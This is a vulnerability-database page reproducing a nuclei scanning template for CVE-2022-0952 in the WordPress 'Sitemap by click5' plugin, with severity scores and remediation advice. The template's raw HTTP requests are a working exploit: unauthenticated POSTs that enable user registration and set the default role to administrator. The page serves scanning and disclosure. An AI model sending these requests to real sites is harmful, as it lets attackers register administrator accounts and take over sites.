Lucene search
K

WordPress Sitemap by click5 <1.0.36 - Missing Authorization

🗓️ 03 Jul 2026 13:39:16Reported by ProjectDiscoveryType 
nuclei
 nuclei
🔗 github.com👁 104 Views

WordPress Sitemap by click5 plugin <1.0.36 - Missing Authorizatio

Related
Refs
Code
id: CVE-2022-0952

info:
  name: WordPress Sitemap by click5 <1.0.36 - Missing Authorization
  author: random-robbie
  severity: high
  description: |
    WordPress Sitemap by click5 plugin before 1.0.36 is susceptible to missing authorization. The plugin does not have authorization or CSRF checks when updating options via a REST endpoint and does not ensure that the option to be updated belongs to the plugin. An attacker can possibly obtain sensitive information, modify data, and/or execute unauthorized administrative operations in the context of the affected site.
  impact: |
    An attacker can exploit this vulnerability to gain unauthorized access to sensitive information.
  remediation: |
    Update to the latest version of the WordPress Sitemap plugin by click5 (1.0.36 or higher) to fix the missing authorization issue.
  reference:
    - https://wpscan.com/vulnerability/0f694961-afab-44f9-846c-e80a0f6c768b
    - https://nvd.nist.gov/vuln/detail/CVE-2022-0952
    - https://github.com/ARPSyndicate/kenzer-templates
    - https://github.com/RandomRobbieBF/CVE-2022-0952
    - https://github.com/nomi-sec/PoC-in-GitHub
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H
    cvss-score: 8.8
    cve-id: CVE-2022-0952
    cwe-id: CWE-352
    epss-score: 0.13329
    epss-percentile: 0.95931
    cpe: cpe:2.3:a:sitemap_project:sitemap:*:*:*:*:*:wordpress:*:*
  metadata:
    verified: true
    max-request: 3
    vendor: sitemap_project
    product: sitemap
    framework: wordpress
  tags: cve,cve2022,wp,wp-plugin,sitemap,wpscan,wordpress,sitemap_project,vkev,vuln

http:
  - raw:
      - |
        POST /wp-json/click5_sitemap/API/update_html_option_AJAX HTTP/1.1
        Host: {{Hostname}}
        Content-type: application/json;charset=UTF-8

        {"users_can_register":"1"}
      - |
        POST /wp-json/click5_sitemap/API/update_html_option_AJAX HTTP/1.1
        Host: {{Hostname}}
        Content-type: application/json;charset=UTF-8

        {"default_role":"administrator"}
      - |
        POST /wp-json/click5_sitemap/API/update_html_option_AJAX HTTP/1.1
        Host: {{Hostname}}
        Content-type: application/json;charset=UTF-8

        {"users_can_register":"0"}

    matchers:
      - type: dsl
        dsl:
          - 'contains(header, "application/json")'
          - "status_code == 200"
          - "contains(body_1, 'users_can_register')"
          - "contains(body_2, 'default_role')"
        condition: and
# digest: 4a0a004730450221008f898799164763125bcfbba6ff5fadbc4df1919889ab2a3a98399cfb417e31bc022045a4a8bb63bdecc297257d4b8a55f68d861a5218474c11776d4449c7dc00111d:922c64590222798bb761d5b6d8e72950

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation

04 Feb 2026 07:00Current
7.2High risk
Vulners AI Score7.2
CVSS 26.8
CVSS 3.18.8
EPSS0.13329
104